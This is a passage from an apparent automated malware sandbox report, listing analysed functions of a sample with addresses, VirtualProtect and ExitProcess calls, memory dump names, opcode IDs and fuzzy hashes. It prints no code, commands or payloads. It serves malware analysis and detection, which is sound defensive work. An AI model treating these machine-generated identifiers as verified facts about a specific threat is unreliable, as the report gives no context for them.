                                                                                                      • Instruction Fuzzy Hash: 9041D3F1D195299BE7248A14DC94AEA7778EB40320F1041FAE90E77280D63D6FC2CE97
                                                                                                      Function 00407608 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: e15403a7222f750d95f3a3cc262cc18dd3b4689d4df3c0632fe9b76125c1db05
                                                                                                      • Instruction ID: 7f43105594b569ce2f71886fcf772d9d3388be419410715fdbe3e64086a8061b
                                                                                                      • Opcode Fuzzy Hash: e15403a7222f750d95f3a3cc262cc18dd3b4689d4df3c0632fe9b76125c1db05
                                                                                                      • Instruction Fuzzy Hash: 0541C3F1D195299BE7248A14DC50AEA7778EB41320F1041FAE90E77280D63D6FC28FA7
                                                                                                      Function 00407444 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 9b80be8a4043105c1aa8a1c3494e64c74ab850d91ec137a28cc39f865dfa4651
                                                                                                      • Instruction ID: 31ee1aedeef07a746b345c53a8ad931bf6068ef3626153827225d6ce98d2ba93
                                                                                                      • Opcode Fuzzy Hash: 9b80be8a4043105c1aa8a1c3494e64c74ab850d91ec137a28cc39f865dfa4651
                                                                                                      • Instruction Fuzzy Hash: 8441C0B1D091299BE7248A14DC50AEA7778EB40320F1041FAE80E66280D63D6FC28EA7
                                                                                                      Function 00407952 Relevance: 1.6, APIs: 1, Instructions: 111memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: b5f099416402196dcf8b4f58d0d16b4c57e52f8ca2b7886423401e04ddb9b1ac
                                                                                                      • Instruction ID: ce3d9cbe5e5464a0cf0698388fe4db1d1de3779ad22f670eb7f298068a4190af
                                                                                                      • Opcode Fuzzy Hash: b5f099416402196dcf8b4f58d0d16b4c57e52f8ca2b7886423401e04ddb9b1ac
                                                                                                      • Instruction Fuzzy Hash: E14192B1D091699BEB208B14DC90AEEB7B4EB85311F1481FAD84A72281D6396FC1CF57
                                                                                                      Function 0040793B Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 41a3e1cc979d06b631c0e355512e05b8b025d6a2393435e09a19569f2943e036
                                                                                                      • Instruction ID: b980ffef816f3033bc0224a66163b018d9f49f14011bb0c94e264556b9199c7a
                                                                                                      • Opcode Fuzzy Hash: 41a3e1cc979d06b631c0e355512e05b8b025d6a2393435e09a19569f2943e036
                                                                                                      • Instruction Fuzzy Hash: 0431A0B1D091699FEB208A14CC90BEAB774EB85311F1041FAD84AA3281D6396FC1CF56
                                                                                                      Function 004079A2 Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: e2127c3851d7f917094684eb92e14d154968b00b00739268d8695aea9a4b8264
                                                                                                      • Instruction ID: eb9fe9cf541c24a46d31781ccc62694ea9359814790796f5ddebb1367b52a62e
                                                                                                      • Opcode Fuzzy Hash: e2127c3851d7f917094684eb92e14d154968b00b00739268d8695aea9a4b8264
                                                                                                      • Instruction Fuzzy Hash: 193183B1D091699BEB248A10DC91AEEB774EB85315F1481FAD80E72280D6396FC1CF57
                                                                                                      Function 004079B0 Relevance: 1.6, APIs: 1, Instructions: 85memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 7f2385f1cff5cc30fcd21735db54cb8c1a129743aee388dd9c0207187651664d
                                                                                                      • Instruction ID: 5bc515cf4a5c9d47c3c97a42ebb04fd9ff22734c76dc1091c972d53eca74fddb
                                                                                                      • Opcode Fuzzy Hash: 7f2385f1cff5cc30fcd21735db54cb8c1a129743aee388dd9c0207187651664d
                                                                                                      • Instruction Fuzzy Hash: AE3181B1E091699BEB248A10CC90AEEB7B5EB85311F1481FAD80D72280D6396FC1CF57
                                                                                                      Function 004079B9 Relevance: 1.6, APIs: 1, Instructions: 85memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 047698e3305b51a4d20ba2222d744114c3088fab1f0400aadefe282525a3d168
                                                                                                      • Instruction ID: 4c05e157be73716b9a95ff83a346de757059b1c1d904cb1b7498ed13660db618
                                                                                                      • Opcode Fuzzy Hash: 047698e3305b51a4d20ba2222d744114c3088fab1f0400aadefe282525a3d168
                                                                                                      • Instruction Fuzzy Hash: 653192B1E091699BEB24CA14CC90AEEB774EB85315F1081FAD84D73280D6396FC1CF56
                                                                                                      Function 0041F314 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 942a73970f357f56f575eee2bdec882771b214476290103048be2d78051be5be
                                                                                                      • Instruction ID: e6e3a9be5ae8df122aa5a84c778ea7693313293bf189d31e35da3aaba4ad1dc3
                                                                                                      • Opcode Fuzzy Hash: 942a73970f357f56f575eee2bdec882771b214476290103048be2d78051be5be
                                                                                                      • Instruction Fuzzy Hash: DB31FE71D085688FDB24CA14CC54BEABB75AF82306F1881FBDC5966241D6385ECACF85
                                                                                                      Function 004076EC Relevance: 1.6, APIs: 1, Instructions: 83memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 0a169a45f1a0aa12f6940755766ad320e8d7554ec18031713c9a2c4e32c98a41
                                                                                                      • Instruction ID: 05d9b99304cce114bbed341857734fce32daa7a0088535a4fbfeefac8b1e1516
                                                                                                      • Opcode Fuzzy Hash: 0a169a45f1a0aa12f6940755766ad320e8d7554ec18031713c9a2c4e32c98a41
                                                                                                      • Instruction Fuzzy Hash: 4331A2B1D095299BE7248A10DC90AEAB778FB84311F1041FAE90E77280D7396FC1DF56
                                                                                                      Function 00407960 Relevance: 1.6, APIs: 1, Instructions: 81memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
